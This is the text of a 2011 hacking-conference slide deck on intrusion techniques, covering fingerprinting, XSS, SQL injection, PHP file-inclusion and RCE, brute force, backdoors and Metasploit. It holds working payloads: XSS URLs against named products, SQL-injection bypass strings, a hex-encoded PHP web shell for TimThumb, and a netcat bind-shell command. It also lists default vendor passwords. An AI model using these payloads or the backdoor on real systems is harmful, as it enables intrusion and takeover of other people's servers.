Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Intrusion TechniquesDcLabs Hacking Tour 2011
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
chương trình nghị sựchương trình nghị sự
Vân tayThất bại ở những nơiPhía sau cánh cửabạo lựcvỏ mãkhai thácMáy quét
FingerPrint
The best tool for discovery operating systems, services, devices and others: NMAP (Network Mapper)
Basic commands:
nmap host (Basic)nmap –sV host (Service Versions)nmap –PN host ( ICMP ECHO-REPLY Ignore)nmap –O host (Try to grab O.S version)nmap –f host (Firewall/IDS/IPS Evasion)
Grab informations about a target host. Ex: It's used to identify Operational System and/or Services(daemon) version number by TCP/IP response's unique characteristics.
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Passive - FingerPrint
• TTL - When the operating system sets the Time To Live on the outbound packet
• Window Size - When the operating system sets the Window Size at.
• DF - =The operating system set the Don't Fragment bit.
• TOS - The operating system set the Type of Service, and if so, at what.
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
FingerPrintMatrix:
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
FingerPrintU. Bourne
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
FingerPrintIn BackTrack Linux you can find many softwares to
Finger-Print
Http://www.backtrack-linux.com
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Web Vulnerability
Cross Site (XSS) – Reflected / Stored
SQL-Injection
PHP (LFI / RFI/ AFU / RCE)
These vulnerabilities are initially explored through malicious browser requests compromising the targetin a matter of minutes
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Web VulnerabilityCross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users.
Spekx – Knowledge Base - http://server/pls/ksp_acesso.login_script?p_time=%221%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
LMS Web Ensino – TOTVShttp://site/lms/sistema/webensino/index.php?modo=resbusca_biblioteca&pChave=a%22%2F%3E+%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&Submit=Buscar
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Web Vulnerability
Reflected / Stored Xss
DEMO
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Web Vulnerability
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
What is the impact?
Why?
Examples?
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Web VulnerabilitySQL-Injection
It occurs when the attacker can insert a series of SQL statements within a 'query' by manipulating the data entry application.
SELECT campos FROM tabela WHERE campo = '[email protected]';
Inject string: some' OR 'x'='x SELECT fields FROM table WHERE field = ‘some' OR 'x'='x';
admin'-- " or 0=0 # ' or 1=1-- hi' or 'a'='a' or 0=0 -- or 0=0 # " or 1=1-- hi') or ('a'='a" or 0=0 -- ' or 'x'='x or 1=1-- hi") or ("a"="aor 0=0 -- " or "x"="x ' or a=a-- ‘);Drop table x;--' or 0=0 # ') or ('x'='x hi" or 1=1 -- ') or ('a'='a
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
SQL-Injection
LIVE DEMO OCOMONThrowing fudge at the fan
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Web VulnerabilityCGI/PHP Command Injection
It occurs when the attacker insert a series of commands exploiting vulnerable CGI/PHP scripts
OneorZero – AFU + LFI
http://server/oneorzero/index.php?controller=../[FILE].php
WordPress TimThumb (Theme) Plugin – RCE
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Default/Weak passwordsDefault passwords are set by its manufacturers/developers and were not changed after the installation/configuration.
As supplied by the system vendor and meant to be changed at installation time (Nobody do this shit)
Ex: Sw 3Com: User: security - Pass: security
FireBird:User: sysdba - Pass: masterkeyy
Weak: Passwords that are easily guessed or in a keyboard sequential Ex: 123456 - Love - House´s phone - Birthday - Etc...
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Brute Force
It consists in using random combinations of characters/numbers and symbols, wordlists and/or string generators to crack a password
Ex:John the Ripper HydraSSH Brute Force
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Brute ForceDirBuster - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
ExploitsKinds of Exploits:
Local: Usually, the objective of a local exploit is to elevateuser's privileges on the machine as close as possible to root (uid=0) or administrator. They are written to exploitkernel bugs or suid binaries
Remote: It works over a network connection and exploit the vulnerable target without any prior access to it.
www.securityfocus.comwww.secunia.comwww.exploit-db.com
0Days It works usually an unpublished exploit from a brand new found vulnerability. You can buy! $$$$$
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Exploits
If Kernel was patched?Will we cry?
AlexosAlexos=>=>
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Exploits
No!!!! Fuck him!!!We have others ways to pwn the box
GNU C library dynamic linker GNU C library dynamic linker
Suid´sSuid´s
Etc...
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Backdoors/RootKitsUsed to maintain access to the system
We can Netcat use for this purpose: nc –vlp 5555 –e /bin/bash
PHP - ASP - JSP
RootKits
The main purpose of a rootkit is to hide the attacker's presencereplacing vital system binaries from target's systemExample: Hide files (with match strings) Run command when match strings Hide processes Hide open ports, and others.
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Scanners/FuzzersThere are 2 types of scanners: Specific which are written fora specific vulnerability (BSQLHacker, SQLMAP) and Genericwhich are written for various kinds of vulnerabilities. Genericscanners use known service banners/strings to locate the potential target/vulnerabilities
W3afNessus
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Scanners/Fuzzers
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Scanners/Fuzzers
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
SniffersSniffer monitors and analyzes network traffic. Some of these packets may contain critical information (such as logins, passwords and cool infos )WhireShark -
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
MetaSploit
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
MetaSploit
Let´s Fuck Windows?
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Hardening your server
HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system for vulnerabilities or problems in configuration files allowing you to get a quick overview of the security status of your system.
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Questions?
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Contact
Crash - [email protected]
Irc: irc.freenode.net #dclabs
twitter: @crashbrz
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Recommended